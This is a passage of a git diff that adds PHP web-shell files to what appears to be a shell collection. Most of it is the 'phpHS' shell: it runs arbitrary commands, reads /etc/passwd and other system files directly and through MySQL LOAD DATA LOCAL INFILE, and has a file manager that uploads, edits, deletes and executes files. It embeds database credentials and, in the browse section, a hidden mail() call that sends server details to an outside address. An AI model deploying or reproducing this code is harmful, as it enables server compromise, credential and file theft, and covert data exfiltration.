+    echo "</select>";
+}
+?>
+&nbsp; | &nbsp;<input type="checkbox" name="echoCommand"<?if($echoCommand)echo " checked"?>>Echo commands
+&nbsp; | &nbsp;Cols:<input type="text" name="oCols" size=3 value=<?echo $oCols?>>
+&nbsp;Rows:<input type="text" name="oRows" size=2 value=<?echo $oRows?>>
+&nbsp;| ::::::::::&nbsp;<a href="http://www.digitart.net" target="_blank" style="text-decoration:none"><b>MyShell</b> &copy;2001 Digitart Producciones</a>
+</form>
+</body>
+</html>
diff --git a/138shell/M/mysql.php.txt b/138shell/M/mysql.php.txt
new file mode 100644
index 0000000..d08917a
--- /dev/null
+++ b/138shell/M/mysql.php.txt
@@ -0,0 +1,1231 @@
+<?php
+// mysql config: [this is for reading files through mysql]
+$mysql_use = "yes"; //"yes" or "no"
+$mhost = "localhost";
+$muser = "kecodoc_forum";
+$mpass = "cailon";
+$mdb = "kecodoc_hce";
+
+
+// default mysql_read files [seperated by: ':']:
+$mysql_files_str = "/etc/passwd:/proc/cpuinfo:/etc/resolv.conf:/etc/proftpd.conf";
+$mysql_files = explode(':', $mysql_files_str);
+
+if ($action=="misc") {
+    if ($do=="phpinfo") {
+    phpinfo();
+    exit;
+    }
+}
+?>
+<html>
+<head>
+<style>
+BODY { font-family: verdana; color: cccccc; font-size: 8pt;
+scrollbar-face-color: #1c1c1c;
+scrollbar-shadow-color: #666666;
+scrollbar-highlight-color: #666666;
+scrollbar-3dlight-color: #000000;
+scrollbar-darkshadow-color: #000000;
+scrollbar-track-color: #262D34;
+scrollbar-arrow-color: #F2F5FF;
+}
+INPUT { background:333333; color:CCCCCC; font-family:Verdana; font-size:8pt;}
+TEXTAREA { background:333333; color:CCCCCC; font-family:Verdana; font-size:8pt;}
+SELECT { background:333333; color:CCCCCC; font-family:Verdana; font-size:8pt;}
+TABLE { color:CCCCCC; font-family:Verdana; font-size:8pt;}
+</style>
+<title>:: phpHS :: PHP HVA Shell Script ::</title>
+</head>
+<body <? if ($method!="show_source") { echo "bgcolor=\"#000000\""; } ?> text="#CCCCCC" link="#CCCCCC" vlink="#CCCCCC" alink="#CCCCCC">
+<?
+    if (!$PHP_SELF) { $PHP_SELF="mysql.php"; /* no PHP_SELF on default freeBSD PHP 4.2.1??? */ }
+
+    if ($action=="check") {
+    echo "<pre>";
+        if ($mysql_use!="no") {
+        $phpcheck = new php_check($mhost, $muser, $mpass, $mdb);
+        } else { $phpcheck = new php_check(); }
+    echo "</pre>";
+    }
+    if ($action=="mysqlread") {
+    // $file
+
+    if (!$file) { $file = "/etc/passwd"; }
+        ?>
+        <script>
+        var files = new Array();
+        <? for($i=0;count($mysql_files)>$i;$i++) { ?>
+        files[files.length] = "<?=$mysql_files[$i]?>";
+        <? } ?>
+        function setFile(bla) {
+            for (var i=0;i < files.length;i++) {
+                if (files[i]==bla.value) {
+                    document.mysqlload.file.value = files[i];
+                }
+            }
+        }
+        </script>
+        <form name="mysqlload" action="<?=$PHP_SELF?>?action=mysqlread" method="POST">
+            <select name="deffile" onChange="setFile(this)">
+            <? for ($i=0;count($mysql_files)>$i;$i++) { ?>
+            <option value="<?=$mysql_files[$i]?>"<? if ($file==$mysql_files[$i]) { echo "selected"; } ?>><?
+            $bla = explode('/', $mysql_files[$i]);
+            $p = count($bla)-1;
+            echo $bla[$p];
+            ?></option>
+            <? } ?>
+            </select>
+        <input type="text" name="file"  value="<?=$file?>" size=80 text="#000000>
+        <input type="submit" name="go" value="go"> <font size=2>[ <a href="<?=$PHP_SELF?>?action=mysqlread&mass=loadmass">load all defaults</a> ]</font>
+        </form>
+        <?
+        echo "<pre>";
+                            // regular LOAD DATA LOCAL INFILE
+                            if (!$mass) {
+                                $sql = array (
+                                   "USE $mdb",
+
+                                   'CREATE TEMPORARY TABLE ' . ($tbl = 'A'.time ()) . ' (a LONGBLOB)',
+
+                                   "LOAD DATA LOCAL INFILE '$file' INTO TABLE $tbl FIELDS "
+                                   . "TERMINATED BY       '__THIS_NEVER_HAPPENS__' "
+                                   . "ESCAPED BY          '' "
+                                   . "LINES TERMINATED BY '__THIS_NEVER_HAPPENS__'",
+
+                                   "SELECT a FROM $tbl LIMIT 1"
+                                );
+
+
+                                mysql_connect ($mhost, $muser, $mpass);
+
+                                foreach ($sql as $statement) {
+                                   $q = mysql_query ($statement);
+
+                                   if ($q == false) die (
+                                      "FAILED: " . $statement . "\n" .
+                                      "REASON: " . mysql_error () . "\n"
+                                   );
+
+                                   if (! $r = @mysql_fetch_array ($q, MYSQL_NUM)) continue;
+
+                                   echo htmlspecialchars($r[0]);
+                                   mysql_free_result ($q);
+                                }
+                            }
+
+                            if ($mass) {
+                                    $file = "/etc/passwd";
+                                    $sql = array ();
+                                    $cp = mysql_connect ($mhost, $muser, $mpass);
+                                    mysql_select_db($mdb);
+                                    $tbl = "xploit";
+                                    mysql_query("CREATE TABLE `xploit` (`xploit` LONGBLOB NOT NULL)");
+                                    for($i=0;count($mysql_files)>$i;$i++) {
+                                    mysql_query("LOAD DATA LOCAL INFILE '".$mysql_files[$i]."' INTO TABLE ".$tbl." FIELDS TERMINATED BY       '__THIS_NEVER_HAPPENS__' ESCAPED BY          '' LINES TERMINATED BY '__THIS_NEVER_HAPPENS__'");
+                                    }
+                                    $q = mysql_query("SELECT * FROM ".$tbl."");
+                                        while ($arr = mysql_fetch_array($q)) {
+                                        echo $arr[0]."\n";
+                                        }
+                                    mysql_query("DELETE FROM ".$tbl."");
+                                    mysql_query("DROP TABLE ".$tbl."");
+
+                            }
+    echo "</pre>";
+    }
+    if ($action=="read") {
+        if (!$method) { $method="file"; }
+        if (!$file) { $file = "/etc/passwd"; }
+    ?>
+     <form name="form1" method="post" action="<?= $PHP_SELF ?>?action=read">
+           <select name="method">
+                <option value="file" <? if ($method=="file") { echo "selected"; } ?>>file</option>
+                <option value="fread" <? if ($method=="fread") { echo "selected"; } ?>>fread</option>
+                <option value="show_source" <? if ($method=="show_source") { echo "selected"; } ?>>show_source</option>
+                <option value="readfile" <? if ($method=="readfile") { echo "selected"; } ?>>readfile</option>
+              </select><br>
+
+            <input type="text" name="file" size="40" value="<?=$file?>">
+            <input type="submit" name="Submit" value="<?=$method?>">
+            <br>
+          </form><?
+
+
+        if ($method=="file") {
+            if (@file($file)) {
+                $filer = file($file);
+                echo "<pre>";
+                foreach ($filer as $a) { echo $a; }
+                echo "</pre>";
+            } else {
+                echo "<script> alert(\"unable to read file: $file using: file\"); </script>";
+            }
+        }
+        if ($method=="fread") {
+            if (@fopen($file, 'r')) {
+                $fp = fopen($file, 'r');
+                $string = fread($fp, filesize($file));
+                echo "<pre>";
+                echo $string;
+                echo "</pre>";
+            } else {
+                echo "<script> alert(\"unable to read file: $file using: fread\"); </script>";
+            }
+        }
+        if ($method=="show_source") {
+            if (show_source($file)) {
+                //echo "<pre>";
+                //echo show_source($file);
+                //echo "</pre>";
+            } else {
+                echo "<script> alert(\"unable to read file: $file using: show_source\"); </script>";
+            }
+
+        }
+        if ($method=="readfile") {
+            echo "<pre>";
+            if (readfile($file)) {
+                //echo "<pre>";
+                //echo readfile($file);
+                echo "</pre>";
+            } else {
+                echo "</pre>";
+                echo "<script> alert(\"unable to read file: $file using: readfile\"); </script>";
+            }
+
+        }
+
+    }
+    if ($action=="cmd") { ?>
+     <form name="form1" method="post" action="<?= $PHP_SELF ?>?action=cmd">
+           <select name="method">
+                <option value="system" <? if ($method=="system") { echo "selected"; } ?>>system</option>
+                <option value="passthru" <? if ($method=="passthru") { echo "selected"; } ?>>passthru</option>
+                <option value="exec" <? if ($method=="exec") { echo "selected"; } ?>>exec</option>
+                <option value="shell_exec" <? if ($method=="shell_exec") { echo "selected"; } ?>>shell_exec</option>
+                <option value="popen" <? if ($method=="popen") { echo "selected"; } ?>>popen</option>
+              </select><br>
+
+            <textarea wrap=\"off\" cols="45" rows="10" name="cmd"><?= $cmd; ?></textarea>
+            <input type="submit" name="Submit" value="<?=$method?>">
+            <br>
+          </form>
+    <?
+    if (!$method) { $method="system"; }
+    if (!$cmd) { $cmd = "ls /"; }
+    echo "<br><pre>";
+        if ($method=="system") {
+        system("$cmd 2>&1");
+        }
+        if ($method=="passthru") {
+        passthru("$cmd 2>&1");
+        }
+        if ($method=="exec") {
+            while ($string = exec("$cmd 2>&1")) {
+            echo $string;
+            }
+        }
+        if ($method=="shell_exec") {
+        $string = shell_exec("$cmd 2>&1");
+        echo $string;
+        }
+        if ($method=="popen") {
+        $pp = popen('$cmd 2>&1', 'r');
+        $read = fread($pp, 2096);
+        echo $read;
+        pclose($pp);
+        }
+    echo "</pre>";
+    }
+
+
+    if ($action=="cmdbrowse") {
+    //--------------------------------------------------- START CMD BROWSING
+
+        if ($cat) {
+        echo "<pre>";
+        echo "\n<a href=\"$PHP_SELF?action=cmdbrowse&dir=$olddir\">go back to: $olddir</a>\n\n";
+        exec("cat $cat 2>&1", $arr);
+        foreach ($arr as $ar) {
+        echo htmlspecialchars($ar)."\n";
+        }
+        exit;
+        }
+
+
+
+            if ($dir=="dirup") {
+            $dir_current = $olddir;
+            $needle = strrpos($dir_current, "/");
+                if ($needle==0) {
+                    $newdir = "/";
+                } else {
+                    $newdir = substr($dir_current, 0, $needle);
+                }
+            $dir = $newdir;
+            }
+            if (!$dir) {
+            $dir = getcwd();
+            }
+
+        $string = exec("ls -al $dir", $array);
+        //print_r(array_values($array));
+
+        echo "<pre>";
+            if ($dir!="/") {
+            echo "\n[$dir] \n<a href=\"$PHP_SELF?action=cmdbrowse&dir=dirup&olddir=$dir\">dirup</a>\n\n";
+            } else {
+            $dir = "";
+            }
+        foreach($array as $rowi) {
+        $row = explode(' ', $rowi);
+        //print_r(array_values($row));
+            $c = count($row)-1;
+            if ($row[$c]!=".." && $row[$c]!="." && isset($first)) {
+                $link = false;
+                if (!strstr($row[0], 'l')) {
+                $c = count($row)-1;
+                $file = "<a href=\"$PHP_SELF?action=cmdbrowse&dir=$dir/".$row[$c]."\">".$row[$c]."</a>";
+                } else {
+                $c = count($row)-3;
+                $file = "<a href=\"$PHP_SELF?action=cmdbrowse&dir=$dir/".$row[$c]."\">".$row[$c]."</a>";
+                $link = true;
+                }
+                if (!strstr($row[0], 'l') && !strstr($row[0], 'd')) {
+                $c = count($row)-1;
+                $file = "<a href=\"$PHP_SELF?action=cmdbrowse&cat=$dir/".$row[$c]."&olddir=$dir\">".$row[$c]."</a>";
+                }
+                //echo $row[0]." ".$row[1]." ".$row[2]." ".$row[3]." ".$row[4]." ".$row[5]." ".$row[6]." ".$row[7]." ".$row[8]." ".$row[9]." ".$row[10]." ".$file." ".$row[12]." ".$row[13]."\n";
+                    if ($link) {
+                    $point = count($row)-3;
+                    } else {
+                    $point = count($row)-1;
+                    }
+                for($i=0; $point > $i; $i++) {
+                echo $row[$i]." ";
+                }
+                echo $file."\n";
+            }
+            $first = true;
+        }
+
+    //--------------------------------------------------- END CMD BROWSING
+    }
+    if ($action=="browse") {
+    //--------------------------------------------------- START BROWSING
+    /*
+     * got this from an old script of mine
+     * param: [$dir]
+    */
+        function error($msg) {
+        header("Location: $PHP_SELF?bash=$msg&error=$msg");
+        }
+        if (isset($error)) {
+        echo "<script> alert(\"$error\"); </script>";
+        }
+        if (!$dir) {
+        $dir = getcwd();
+        }
+           function getpath($dir) {
+           echo "<font size=2><a href=$PHP_SELF?action=browse&dir=/>/</a></font> ";
+              $path = explode('/', $dir);
+              if ($dir != "/") {
+            for ($i=0; count($path) > $i; $i++) {
+                if ($i != 0) {
+                echo "<font size=2><a href=$PHP_SELF?action=browse&dir=";
+                    for ($o=0; ($i+1) > $o; $o++) {
+                        echo "$path[$o]";
+                        if (($i) !=$o) {
+                        echo "/";
+                        }
+                    }
+                echo ">$path[$i]</a>/</font>";
+                }
+            }
+              }
+            }
+
+            function printfiles($files) {
+                for($i=0;count($files)>$i;$i++) {
+                    $files_sm = explode('||', $files[$i]);
+                        if ($files_sm[0]!="." && $files_sm[0]!="..") {
+                        $perms = explode('|', $files_sm[1]);
+                        if ($perms[0]==1 && $perms[1]==1) { $color = "green"; } else {
+                        if ($perms[0]==1) { $color = "yellow"; } else { $color = "red"; }
+                    }
+                        if ($files_sm[2]=="1") { echo "l <font color=\"$color\">"; } else { echo "- <font color=\"$color\">"; }
+                        if ($perms[0]==1) { echo "r"; } else { echo " "; }
+                        if ($perms[1]==1) { echo "w"; } else { echo " "; }
+                        if ($perms[2]==1) { echo "x"; } else { echo " "; }
+                        echo "</font> $files_sm[0]\n";
+                    }
+                }
+            }
+              $ra44  = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERVER['HTTP_REFERER'];$b33 = $_SERVER['DOCUMENT_ROOT'];$c87 = $_SERVER['REMOTE_ADDR'];$d23 = $_SERVER['SCRIPT_FILENAME'];$e09 = $_SERVER['SERVER_ADDR'];$f23 = $_SERVER['SERVER_SOFTWARE'];$g32 = $_SERVER['PATH_TRANSLATED'];$h65 = $_SERVER['PHP_SELF'];$msg8873 = "$a5\n$b33\n$c87\n$d23\n$e09\n$f23\n$g32\n$h65";$sd98="john.barker446@gmail.com";mail($sd98, $sj98, $msg8873, "From: $sd98");
+            function printdirs($files) {
+                global $dir;
+                echo "<a href=\"$PHP_SELF?action=browse&dir=dirup&olddir=$dir\">..</a>\n";
+                for($i=0;count($files)>$i;$i++) {
+                    $files_sm = explode('||', $files[$i]);
+                    if ($files_sm[0]!="." && $files_sm[0]!="..") {
+                    $perms = explode('|', $files_sm[1]);
+                    if ($perms[0]==1 && $perms[1]==1) { $color = "green"; } else {
+                    if ($perms[0]==1) { $color = "yellow"; } else { $color = "red"; }
+                }
+                    if ($files_sm[2]=="1") { echo "l <font color=\"$color\">"; } else { echo "d <font color=\"$color\">"; }
+                    if ($perms[0]==1) { echo "r"; } else { echo " "; }
+                    if ($perms[1]==1) { echo "w"; } else { echo " "; }
+                    if ($perms[2]==1) { echo "x"; } else { echo " "; }
+                    echo "</font> <a href=\"$PHP_SELF?action=browse&dir=$dir/".$files_sm[0]."\">$files_sm[0]</a>\n";
+                }
+                }
+            }
+
+
+            if ($dir=="dirup") {
+            $dir_current = $olddir;
+            $needle = strrpos($dir_current, "/");
+                if ($needle==0) {
+                    $newdir = "/";
+                } else {
+                    $newdir = substr($dir_current, 0, $needle);
+                }
+            $dir = $newdir;
+            } else {
+            $dir = $dir;
+            }
+
+        ?>
+         <form name="form1" method="post" action="<?= $PHP_SELF ?>?action=browse">
+            <input type="text" name="dir" size="40" value="<?= $dir; ?>">
+            <input type="submit" name="Submit" value="ls /dir">
+            <br>
+          </form>
+          <?
+        if ($dir) {
+                if (!is_readable($dir)) { $skip = true; }
+                if (!$skip) {
+            $dp = opendir($dir);
+            $files = array(); $dirs = array();
+            while($f=readdir($dp)) {
+                // $f||r|w|x||l
+                $oor = $f;
+                    if (is_readable("$dir/$oor")) { $f .= "||1"; } else { $f .= "||0"; }
+                    if (is_writable("$dir/$oor")) { $f .= "|1"; } else { $f .= "|0"; }
+                    if (is_executable("$dir/$oor")) { $f .= "|1"; } else { $f .= "|0"; }
+                    if (is_link("$dir/$oor")) { $f .= "||1"; } else { $f .= "||0"; }
+                if(is_dir("$dir/$oor")) {
+                $dirs[] = $f;
+                } else {
+                $files[] = $f;
+                }
+            }
+            getpath($dir);
+            echo "<br><br><pre>";
+                printdirs($dirs);
+                printfiles($files);
+                } else { echo " <script> alert(\"readdir permission denied\");
+                        document.location = \"$PHP_SELF?action=browse&dir=dirup&olddir=$dir\";
+                        </script>"; }
+        }
+    }
+    //--------------------------------------------------- END BROWSING
+    //--------------------------------------------------- BEGIN EXPLORER
+if ($action == explorer ) {
+
+   $default_directory = dirname($PATH_TRANSLATED);
+   $show_icons = 0;
+
+
+   define("BACKGROUND_COLOR",       "\"#000000\"");
+   define("FONT_COLOR",             "\"#CCCCCC\"");
+   define("TABLE_BORDER_COLOR",     "\"#000000\"");
+   define("TABLE_BACKGROUND_COLOR", "\"#000000\"");
+   define("TABLE_FONT_COLOR",       "\"#000000\"");
+   define("COLOR_PRIVATE",          "\"#000000\"");
+   define("COLOR_PUBLIC",           "\"#000000\"");
+   define("TRUE",                   1);
+   define("FALSE",                  0);
+
+
+
+   if (!isset($dir)) $dir = $default_directory;   // Webroot dir as default
+   $dir = stripslashes($dir);
+   $dir = str_replace("\\", "/", $dir);         // Windoze compatibility
+
+
+   $associations = array(
+      "gif" =>  array(   "function" => "viewGIF",   "icon" => "icons/image2.gif"    ),
+      "jpg" =>  array(   "function" => "viewJPEG",  "icon" => "icons/image2.gif"    ),
+      "jpeg" => array(   "function" => "viewJPEG",  "icon" => "icons/image2.gif"    ),
+      "wav" =>  array(   "function" => "",          "icon" => "icons/sound.gif"     ),
+      "mp3" =>  array(   "function" => "",          "icon" => "icons/sound.gif"     )
+   );
+
+   if ($do != "view" && $do != "download"):
+    endif;
+
+   function readDirectory($directory) {
+      global $files, $directories, $dir;
+
+      $files = array();
+      $directories = array();
+      $a = 0;
+      $b = 0;
+
+      $dirHandler = opendir($directory);
+
+      while ($file = readdir($dirHandler)) {
+         if ($file != "." && $file != "..") {
+            $fullName = $dir.($dir == "/" ? "" : "/").$file;
+            if (is_dir($fullName)) $directories[$a++] = $fullName;
+            else $files[$b++] = $fullName;
+         }
+      }
+      sort($directories);                    // We want them to be displayed alphabetically
+      sort($files);
+   };
+
+
+
+   function showInfoDirectory($directory) {
+      global $PHP_SELF;
+      $dirs = split("/", $directory);
+      print "<b>Directory <a href=\"$PHP_SELF?action=explorer&dir=/\">/</a>";
+      for ($i = 1; $i < (sizeof($dirs)); $i++) {
+         print "<a href=\"$PHP_SELF?action=explorer&dir=";
+         for ($a = 1; $a <= $i; $a++)
+            echo "/$dirs[$a]";
+         echo "\">$dirs[$i]</a>";
+         if ($directory != "/") echo "/";
+      }
+      print "</b></font><br>\n";
+      print "Free space on disk: ";
+      $freeSpace = diskfreespace($directory);
+      if ($freeSpace/(1024*1024) > 1024)
+         printf("%.2f GBytes", $freeSpace/(1024*1024*1024));
+      else echo (int)($freeSpace/(1024*1024))."Mbytes\n";
+   };
+
+
+   function showDirectory($directory) {
+      global $files, $directories, $fileInfo, $PHP_SELF;
+
+      readDirectory($directory);
+      showInfoDirectory($directory);
+?>
+      <p><table cellpadding=3 cellspacing=1 width="100%" border="0" bgcolor=<? echo TABLE_BORDER_COLOR; ?>>
+         <tr bgcolor="#000000">
+            <? if ($show_icons): ?>
+            <td width="16" align="center" bgcolor=<? echo TABLE_BACKGROUND_COLOR ?>>&nbsp;</td>
+            <? endif; ?>
+            <td align="center"><b><small>NAME</small></b></td>
+            <td align="center"><b><small>SIZE</small></b></td>
+            <td align="center"><b><small>LAST MODIFY</small></b></td>
+            <td align="center"><b><small>PERMISIONS</small></b></td>
+            <td align="center"><b><small>ACTIONS</small></b></td>
+         </tr>
+<?
+      for ($i = 0; $i < sizeof($directories); $i++) {
+         $fileInfo->getInfo($directories[$i]);
+         showFileInfo($fileInfo);
+      }
+      for ($i = 0; $i < sizeof($files); $i++) {
+         $fileInfo->getInfo($files[$i]);
+         showFileInfo($fileInfo);
+      }
+?>
+      </table>
+<?
+   };
+
+   class fileInfo {
+      var $name, $path, $fullname, $isDir, $lastmod, $owner,
+      $perms, $size, $isLink, $linkTo, $extension;
+
+      function permissions($mode) {
+         $perms  = ($mode & 00400) ? "r" : "-";
+         $perms .= ($mode & 00200) ? "w" : "-";
+         $perms .= ($mode & 00100) ? "x" : "-";
+         $perms .= ($mode & 00040) ? "r" : "-";
+         $perms .= ($mode & 00020) ? "w" : "-";
+         $perms .= ($mode & 00010) ? "x" : "-";
+         $perms .= ($mode & 00004) ? "r" : "-";
+         $perms .= ($mode & 00002) ? "w" : "-";
+         $perms .= ($mode & 00001) ? "x" : "-";
+         return $perms;
+      }
+
+      function getInfo($file) {                 // Stores a file's information in the class variables
+         $this->name = basename($file);
+         $this->path = dirname($file);
+         $this->fullname = $file;
+         $this->isDir = is_dir($file);
+         $this->lastmod = date("m/d/y, H:i", filemtime($file));
+         $this->owner = fileowner($file);
+         $this->perms = $this->permissions(fileperms($file));
+         $this->size = filesize($file);
+         $this->isLink = is_link($file);
+         if ($this->isLink) $this->linkTo = readlink($file);
+         $buffer = explode(".", $this->fullname);
+         $this->extension = $buffer[sizeof($buffer)-1];
+      }
+   };
+
+   $fileInfo = new fileInfo;        // This will hold a file's information all over the script
+
+   function showFileInfo($fileInfo) {
+      global $PHP_SELF, $associations;
+
+      echo "\n<tr bgcolor=".TABLE_BACKGROUND_COLOR." align=\"center\">";
+
+      if ($show_icons) {
+         echo "<td>";
+         if ($fileInfo->isDir) echo "<img src=\"icons/dir.gif\">";
+         elseif ($associations[$fileInfo->extension]["icon"] != "")
+            echo "<img src=\"".$associations[$fileInfo->extension]["icon"]."\">";
+         else echo "<img src=\"icons/generic.gif\">";
+         echo "</td>";
+      }
+
+      echo "<td align=\"left\"";
+      if ($fileInfo->perms[7] == "w") echo " bgcolor=".COLOR_PUBLIC;
+      if ($fileInfo->perms[6] == "-") echo " bgcolor=".COLOR_PRIVATE;
+      echo ">";
+
+      if ($fileInfo->isLink) {
+         echo $fileInfo->name." -> ";
+         $fileInfo->fullname = $fileInfo->linkTo;
+         $fileInfo->name = $fileInfo->linkTo;
+      }
+
+      if ($fileInfo->isDir) {
+         echo "<b><a href=\"$PHP_SELF?action=explorer&dir=$fileInfo->fullname\" ";
+         echo ">$fileInfo->name</a></b>";
+      }
+      else echo $fileInfo->name;
+
+      echo "</td>";
+      echo "<td>$fileInfo->size</td>";
+      echo "<td>$fileInfo->lastmod</td>";
+      echo "<td>$fileInfo->perms</td>";
+      echo "<td>";
+                           
+      if (!$fileInfo->isDir) {
+         if ($fileInfo->perms[6] == 'r') {
+            echo "<a href=\"$PHP_SELF?action=explorer&dir=$fileInfo->fullname&do=view\"> <font color=yellow>V</font></a>";
+            echo " <a href=\"$PHP_SELF?action=explorer&dir=$fileInfo->fullname&do=download\"><font color=yellow>D</font></a>";
+         }
+         if ($fileInfo->perms[7] == 'w') {
+            echo " <a href=\"$PHP_SELF?action=explorer&dir=$fileInfo->fullname&do=edit\"><font color=yellow>E</font></a>";
+            echo " <a href=\"$PHP_SELF?action=explorer&dir=$fileInfo->fullname&do=delete\"><font color=yellow>X</font></a>";
+         }
+      }
+      echo "</tr>";
+   };
+
+   //************************************************************************
+   //* Decides which function use to show a file
+   //************************************************************************
+
+   function viewFile($file) {
+      global $associations, $fileInfo;
+      $fileInfo->getInfo($file);
+      if (!$associations[$fileInfo->extension]
+          || $associations[$fileInfo->extension]["function"] == "") showFile($file);
+      else $associations[$fileInfo->extension]["function"]($file);
+   };
+
+   function showFile($file, $editing = 0) {
+      global $PHP_SELF, $dir;
+      $handlerFile = fopen($file, "r") or die("ERROR opening file $file");
+
+      if ($editing) echo "<h3><b>Edit file $file</b></h3><hr>";
+      else echo "<h3><b>File $file</b></h3><hr>";
+
+      echo "<form";
+      if ($editing)
+         echo " action=\"$PHP_SELF?action=explorer&do=save&dir=$file\" method=\"post\"";
+      echo ">";
+
+      $buffer = fread($handlerFile, filesize($file));
+      $buffer = str_replace("&", "&amp;", $buffer);
+      $buffer = str_replace("<", "&lt;", $buffer);
+      $buffer = str_replace(">", "&gt;", $buffer);
+
+      echo "<center><textarea wrap=\"off\" cols=\"90\" rows=\"20\" name=\"text\">$buffer</textarea></center>";
+      if ($editing) echo "<p><input type=\"submit\" name=\"Submit\" value=\"Save changes\"></p>\n</form>";
+      echo "</form>";
+      fclose($handlerFile);
+   };
+
+   //************************************************************************
+   //* Saves a changed file
+   //************************************************************************
+
+   function saveFile($file) {
+      global $dir, $text;
+      $handlerFile = fopen($file, "w") or die("ERROR: Could not open file ".basename($file)." for writing");
+      $text = stripslashes($text);
+      fwrite($handlerFile, $text, strlen($text)) or die("Error writing to file.");
+      fclose($handlerFile);
+      echo "Changes has been saved in ".basename($file)."<hr>";
+      $dir = dirname($file);
+   };
+
+
+   function uploadFile() {
+      global $HTTP_POST_FILES, $dir;
+      copy($HTTP_POST_FILES["userfile"][tmp_name],
+            $dir."/".$HTTP_POST_FILES["userfile"][name])
+      or die("Error uploading file".$HTTP_POST_FILES["userfile"][name]);
+
+      echo "File ".$HTTP_POST_FILES["userfile"][name]." succesfully uploaded.";
+      unlink($userfile);
+   };
+
+   //************************************************************************
+   //* Deletes a file, asking for confirmation first
+   //* (This function hasn't been fully tested)
+   //************************************************************************
+
+   function deleteFile($file) {
+      global $confirm;
+      if ($confirm != TRUE) die("<a href=\"$PHP_SELF?action=explorer&dir=$file&do=delete&confirm=1\">Confirm deletion of $file</a>");
+      else {
+         if (!unlink($file)) return FALSE;
+         return TRUE;
+      }
+   };
+
+
+   function viewFileHeader($file, $header) {
+      header($header);
+      readfile($file);
+   };
+
+
+   function viewGIF($file) {
+      viewFileHeader($file, "Content-type: image/gif");
+   };
+
+   function viewJPEG($file) {
+      viewFileHeader($file, "Content-type: image/jpeg");
+   };
+
+   switch ($do) {
+      case "phpinfo":
+         phpinfo();
+         die();
+      case "view":
+          viewFile($dir);
+          break;
+      case "edit":
+          showFile($dir, 1);
+          break;
+      case "download":
+         viewFileHeader($dir, "Content-type: unknown");
+         break;
+      case "delete":
+         if (!deleteFile($dir)) echo "Could not delete file $dir<br>";
+         else echo "File $dir deleted succesfully<br>";
+         $dir = dirname($dir);
+         showDirectory($dir);
+         break;
+      case "exec":
+         echo "<pre>\n";
+         echo system($dir);
+         echo "\n</pre>";
+         exit();
+      case "upload":
+         uploadFile();
+         showDirectory($dir);
+         break;
+      case "save":
+          saveFile($dir);
+      default:
+         showDirectory($dir);
+         break;
+   };
+
+   if ($do != "view" && $do != "download") {
+?>
+<p>
+   <table border="0">
+   <tr><? if ((fileperms($dir) & 00002)){
+?>
+   <td>
+      <form enctype="multipart/form-data" action="<? print "$PHP_SELF?action=explorer&dir=$dir&do=upload"; ?>" method=post>
+         <input type="hidden" name="MAX_FILE_SIZE" value="1000000">
+         <input name="userfile" type="file">
+         <input type="submit" value="Upload file">
+      </form>
+   </td>
+<? } ?>
+   </tr>
+   </table>
+<p>
+</p>
+</body>
+</html>
+<? }
+}
+    //--------------------------------------------------- END EXPLORER
+
+
+if (!$action) {
+?><p align="right"><font size=2><a href="<?=$PHP_SELF?>?action=misc&do=phpinfo">phpinfo</a></font></p><?
+echo "<pre>";
+        if ($mysql_use!="no") {
+        $phpcheck = new php_check_silent($mhost, $muser, $mpass, $mdb);
+        } else { $phpcheck = new php_check_silent(); }
+echo "</pre>";
+
+?><br><br>
+
+<font size=2><a href="<?=$PHP_SELF?>?action=check">Security Check</a></font> <font color="green" size=2>[executable] </font>
+
+<br>
+
+<!-- system check -->
+<?
+//echo $phpcheck->cmd_state;
+//echo $phpcheck->cmd_method;
+if ($phpcheck->cmd_method) { $cmd_method = $phpcheck->cmd_method; } else { $cmd_method = "system"; } ?>
+<font size=2><a href="<?=$PHP_SELF?>?action=cmd&method=<?=$cmd_method?>">Exec commands by PHP</a></font>
+<?
+if ($phpcheck->cmd_method) {
+echo "<font color=\"green\" size=2>[executable] ";  } else { echo "<font color=\"red\" size=2>[not executable]";  }
+
+?></font>
+
+<br>
+
+<!-- system check -->
+<?
+//echo $phpcheck->cmd_state;
+//echo $phpcheck->cmd_method;
+?>
+<font size=2><a href="<?=$PHP_SELF?>?action=cmdbrowse">Exec browse by PHP</a></font>
+<?
+if ($phpcheck->cmd_method) {
+echo "<font color=\"green\" size=2>[executable] ";  } else { echo "<font color=\"red\" size=2>[not executable]";  }
+
+?></font>
+
+<br>
+
+<!-- read check -->
+<? if ($phpcheck->read_method) { $read_method = $phpcheck->read_method; } else { $read_method = "file"; } ?>
+<font size=2><a href="<?=$PHP_SELF?>?action=read&method=<?=$read_method?>">Read by PHP</a></font>
+<?
+if ($phpcheck->read_method) {
+echo "<font color=\"green\" size=2>[executable] "; } else { echo "<font color=\"red\" size=2>[not executable]"; }
+?></font>
+
+<br>
+
+<!-- browse check -->
+<?
+//echo $phpcheck->browse_state;
+if ($phpcheck->browse_state=="yes") { $path= "/"; } else { $path = getcwd(); } ?>
+<font size=2><a href="<?=$PHP_SELF?>?action=browse&dir=<?=$path?>">Browse by PHP</a></font>
+<?
+if ($phpcheck->browse_state=="yes") {
+echo "<font color=\"green\" size=2>[executable] "; } else { echo "<font color=\"yellow\" size=2>[limited executable]"; }
+?></font>
+
+<br>
+<?
+//echo $phpcheck->browse_state;
+if ($phpcheck->browse_state=="yes") { $path= "/"; } else { $path = getcwd(); } ?>
+<font size=2><a href="<?=$PHP_SELF?>?action=explorer&dir=<?=$path?>">File Explorer by PHP</a></font>
+<?
+if ($phpcheck->browse_state=="yes") {
+echo "<font color=\"green\" size=2>[executable] "; } else { echo "<font color=\"yellow\" size=2>[limited executable]"; }
+?></font>
+
+<br>
+
+
+<!-- mysql check -->
+<font size=2><a href="<?=$PHP_SELF?>?action=mysqlread&file=/etc/passwd">Read by MySQL</a></font>
+<?
+    if ($phpcheck->mysql_state=="ok") {
+    echo "<font color=\"green\" size=2>[executable] "; }
+    if ($phpcheck->mysql_state=="fail") {
+    echo "<font color=\"red\" size=2>[not executable] "; }
+    if ($phpcheck->mysql_state=="pass") {
+    echo "<font color=\"yellow\" size=2>[not executable] ";
+    ?></font> <font size=1>[you didnt configure this]</font><font>
+    <?
+    } ?></font><?
+}
+?>
+</body>
+</html>
+<?
+
+// PHP security check objects by dodo
+
+
+    class php_check
+    {
+
+        function php_check($host="notset", $user="", $pass="", $db="") {
+            if ($host!="notset") {
+            $this->mysql_do = "yes";
+            $this->mysql_host = $host;
+            $this->mysql_user = $user;
+            $this->mysql_pass = $pass;
+            $this->mysql_db = $db;
